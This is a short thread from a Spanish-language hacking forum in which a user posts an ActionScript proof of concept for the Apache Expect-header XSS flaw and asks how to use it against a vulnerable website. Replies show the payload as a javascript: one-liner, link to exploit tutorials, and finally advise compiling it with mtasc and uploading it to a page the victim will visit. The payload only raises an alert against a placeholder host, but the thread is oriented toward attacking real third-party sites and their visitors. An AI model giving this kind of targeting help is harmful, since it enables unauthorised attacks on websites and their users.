Duda exploit Apache Expect XSS

Iniciado por & eDu &, 18 Mayo 2008, 12:08 PM

0 Miembros y 1 Visitante están viendo este tema.

& eDu &

Bueno tengo este exploit
var req:LoadVars=new LoadVars();
req.addRequestHeader("Expect",
"<script>alert('gotcha!')</script>");
req.send("http://www.target.site/","_blank","GET");

y quiero explotarlo en una web vulnerable a el, pero no se como, si lo saben diganmelo. Gracias ;)

Azielito

#1
Pues que sistema es ese?

a simple vista es una web hecha en AJAX y ese es codigo javascript, pos la puees ejecutar desde la barra de direcciones

Código (javascript) [Seleccionar]
javascript:var req:LoadVars=new LoadVars();req.addRequestHeader("Expect","<script>alert('gotcha!')</script>");req.send("http://www.target.site/","_blank","GET");



pero debes encontrar esa web vulnerable, de donde sacaste ese codigo?
o sea, pasa la url para ver para que sistema es xD

& eDu &

#2
x.es
¿Que pongo en la url
www.x.es/javascript:var req:LoadVars=new LoadVars();req.addRequestHeader("Expect","<script>alert('gotcha!')</script>");req.send("http://www.target.site/","_blank","GET")

?

Azielito

#3
mmmhhh.. no, vas a tener que cargar el JS dara error por el ":" del var req:LoadVars ¬¬

Mirate los post pegados para que entiendas mejor de que se trata...

no recuerdo si hay info sobre eso xDD mejor lee lo que tenemos por aca
http://www.elhacker.net/jasildbg/




Tantes que leas algo mejor lee esto que te servira bastante

http://foro.elhacker.net/bugs_y_exploits/taller_introduccion_a_los_bugs_a_nivel_web-t173509.0.html

Cuando termines de leer este entonces sigues con este

https://foro.elhacker.net/bugs_y_exploits/taller_de_introduccion_a_bugsexploits_1deg-t103198.0.html

y ya luego lees el de jasildbg

:D

sirdarckcat

eso es flash jaja

compila ese codigo con mtasc, y subelo a una web que vea tu victima y yap :P